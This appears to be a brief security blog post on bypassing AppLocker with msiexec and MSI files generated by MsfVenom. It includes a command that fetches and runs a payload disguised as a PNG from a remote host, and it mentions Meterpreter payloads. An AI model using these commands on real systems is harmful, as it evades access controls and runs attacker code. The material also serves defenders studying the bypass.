MSIEXEC is a Microsoft utility that can be used to install or configure a product from the command line. If an environment is not configured properly the use of .MSI files can allow an attacker either to perform privilege escalation or to bypass AppLocker rules. The following post demonstrates that systems that are configured not to block execution of MSI files for all users are not properly protected as any AppLocker executable rule can be bypassed easily.

Metasploit MsfVenom can be used in order to generate .MSI files that will execute a command or a payload.

Execution of powershell.msi will open a PowerShell session bypassing the AppLocker rule that deny the use of PowerShell for all users.

MSIEXEC – PowerShell

It is also possible to run the command below either from a command prompt or if it is blocked through Windows Run.

msiexec /quiet /i cmd.msi

MSIEXEC via Run

The command prompt will open.

MSIEXEC – Command Prompt

Alternatively msiexec utility has the ability to run MSI files that have been renamed to PNG. These files can be executed either locally or remotely from a command prompt or from Windows Run bypassing AppLocker rules.

msiexec /q /i http://192.168.100.3/tmp/cmd.png

MSIEXEC – Command Prompt via PNG

The same concept applies and for MSI files that contain Meterpreter payloads.